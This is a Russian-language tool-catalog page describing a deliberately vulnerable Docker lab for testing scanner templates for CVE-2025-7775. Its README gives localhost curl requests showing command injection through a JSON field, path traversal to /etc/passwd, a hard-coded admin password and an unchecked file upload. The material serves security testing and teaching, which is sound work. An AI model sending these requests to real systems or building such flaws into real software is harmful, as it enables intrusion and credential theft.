Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-7775-vulnerable-lab — Уязвимое Docker-приложение, раскрывающее RCE, обход пути, жестко заданные учетные данные и небезопасную загрузку файлов; изолированная лаборатория для тестирования шаблонов сканеров безопасности. | Kitploit
Инструменты/GitHubGitHub/aaqilyousuf/cve-2025-7775-vulnerable-lab
Сканеры уязвимостейЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubaaqilyousuf/cve-2025-7775-vulnerable-lab

CVE-2025-7775-vulnerable-lab

Уязвимое Docker-приложение, раскрывающее RCE, обход пути, жестко заданные учетные данные и небезопасную загрузку файлов; изолированная лаборатория для тестирования шаблонов сканеров безопасности.

Репозиторий
131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-7775 Уязвимая лаборатория

Этот репозиторий предоставляет уязвимую среду для тестирования шаблона nuclei для CVE-2025-7775.

Запуск

docker build -t vuln-app .
docker run -d --name vuln-test -p 5000:5000 vuln-app

Тесты уязвимостей

1. Удаленное выполнение команд (RCE)

curl -X POST http://localhost:5000/api/v1/configuration \
  -H "Content-Type: application/json" \
  -d '{"payload":"ls > /tmp/poc_rce.txt"}'

docker exec -it vuln-test cat /tmp/poc_rce.txt

2. Обход пути

curl "http://localhost:5000/download?file=/etc/passwd"

3. Жестко прописанные учетные данные

curl -X POST http://localhost:5000/api/v1/login \
  -H "Content-Type: application/json" \
  -d '{"username":"admin", "password":"citrix123"}'

4. Небезопасная загрузка файлов

echo "POC FILE UPLOAD" > test.txt
curl -X POST -F "[email protected]" http://localhost:5000/upload
docker exec -it vuln-test cat /tmp/test.txt

Примечания по использованию

  • Это смоделированная уязвимая среда, предназначенная только для тестирования
  • Используйте только в изолированных лабораторных средах
  • Не предназначено для использования в производственной среде
  • Только для образовательных целей и исследований в области безопасности

Очистка

docker stop vuln-test
docker rm vuln-test
docker rmi vuln-app
Скачать инструмент